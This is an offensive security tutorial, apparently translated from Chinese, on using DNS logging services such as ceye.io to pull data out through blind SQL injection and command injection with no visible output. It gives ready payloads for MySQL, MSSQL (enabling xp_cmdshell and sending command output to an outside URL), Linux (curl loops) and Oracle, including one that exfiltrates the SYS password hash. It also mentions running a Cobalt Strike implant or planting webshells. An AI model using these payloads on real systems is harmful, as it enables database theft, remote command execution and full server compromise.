0x01 injection using dnslog principle
As shown in the figure, as an attacker, submit an injection statement and let the database concatenate the value to be queried with the domain name, and then a DNS query occurs. As long as we can obtain the DNS log, we get the desired value. So we need to have our own domain name, and then configure an NS record at the domain name dealer, and then we can get DNS logs on the NS server.
Free DNS server platform:
http://ceye.io/ http://dnslog.cn/
0x02 under which scenarios dnslog is used
- Blind injection in SQL injection
- Command execution without echo
- SSRF without echo
The simple understanding is that in some cases where the vulnerability cannot be directly used to obtain the echo, but the target can initiate a DNS request, this time you can take out the data you want in this way.
Application of 0x03 in mysql blind injection
The load_file function is mainly used in mysql. It is used to read the file in mysql and return the file content as a string. In fact, it can also be used to send dns requests.
And it should be noted that the load_file function cannot be used to perform dnslog attacks under Linux.
To use this function, the following conditions must be met: (1). The file read must be on the server, and the absolute path of the file must be specified (2). The user connecting to the current database must have FILE permission (3). The file content must be less than max_allowed_packet.
Payload utilized:
? id = 1 ' union select load_file (concat ( ' \\\\\\\\ ' , (select database ()), ' .xxxx.ceye.io \\ abc ' ))-+ ? id = 1 ' and if ((select load_file (concat ( ' \\\\ ' , (select database ()), ' .XXXXX.ceye.io \\ abc ' ))), 1,1)-+ database () is to Where to do SQL injection query
The ceye.io platform will be assigned a second-level domain name after registration. Here we stitch the query statement to the third-level domain name. After dns resolution, the resolution domain name will be recorded on the platform. Each recorded third-level domain name will display our SQL statement. The result of the query. For example, here the third-level domain name will be the query database. Using dnslog to make the query results displayed completely is much faster than direct blind injection query.
When querying a table or field, you need to add a limit to limit the output. Each query corresponds to a dns record, that is, a third-level domain name, a query result, so the limit limit output is 1.
Here is an example of the eighth level of sqli-labs blind injection, practice dnslog injection:
View the current database:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1%27and%20if((select%20load_file(concat(%27\\\\%27,(select%20database()),%27.xxx.ceye.io\\abc%27))),1,1)--+
You can see that the current database is security
To get the current user, you need to hex the user () function, hex (user ())
Then unzip the hex character, and decode it here as: root @ localhost
Subsequent operations are similar to the above. Here the load_file function execution result is null and problematic, you need to first solve the three conditions that need to be met to use this function.
0x04 application in mssql
Need to have stack injection, can be used; execute sql commands one by one, poc:
http://127.0.0.1/mssql.php?id=1; DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) FROM 库名.dbo.test_user where [USER] = 'admin')%2b'.nk40ci.ceye.io'; EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');
Test for stacking:?id=1';WAITFOR DELAY '0:0:5'--
Get the current user:
id=2';declare @a char(128);set @a='\\'%2buser%2b'.***.ceye.io\abc';exec master..xp_dirtree @a;--
Get the library name:
id=2';declare @a char(128);set @a='\\'%2b(select top 1 name from master.dbo.sysdatabases)%2b'.***.ceye.io\abc';exec master..xp_dirtree @a;--
Use sqlmap to run out. If the database has sa permission, then you can open the xp_cmdshell component to execute the command
开启xp_cmdshell: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
The command executes the sql statement:
id=2';exec master..xp_cmdshell 'whoami'--
In this case, there is no echo execution.
With dnslog, return the result of the command execution to the dns server platform through the following statement, and check the http log:
?id=1';exec master..xp_cmdshell "for /F %s in ('whoami') do start http://xxx.ceye.io/?%s"--
Return the display result of whoami execution to the last variable of http recorded url, the variable name is the command execution display result.
Since this statement will open the local default browser, you need to close the browser, if the default is not ie, just look at it with tasklist:
?id=123';exec master..xp_cmdshell "taskkill /f /im iexplore.exe"--
In fact, you do n’t need to know the echo result in actual combat, as long as you can execute the command, then you can download and execute our cs horse if you can connect to the external network, and then go online directly. Or know the absolute path to write webshell directly.
For the Linux server:
http curl: // xxx.ceye.io / `whoami` see http recorded on the platform and then the ping -c 1 ` whoami`.xxx.ceye.io View dns record in the platform require multiple displays the results of LS: for i in $ (ls /); do curl " http: //$i.xxx.ceye.io/ " ; done;
Automated command execution tool: https://github.com/quyunjie/Red-Team/blob/master/mssql-rce/mandros.py
0x05 oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS('b182oj.ceye.io'); SELECT UTL_HTTP.REQUEST('http://b182oj.ceye.io/oracle') FROM DUAL; SELECT HTTPURITYPE('http://b182oj.ceye.io/oracle').GETCLOB() FROM DUAL; SELECT DBMS_LDAP.INIT(('oracle.b182oj.ceye.io',80) FROM DUAL; SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.b182oj.ceye.io',80) FROM DUAL;
Reference link: https://www.anquanke.com/post/id/98096#h3-5
About script automation using dnslog: https://github.com/ADOOO/DnslogSqlinj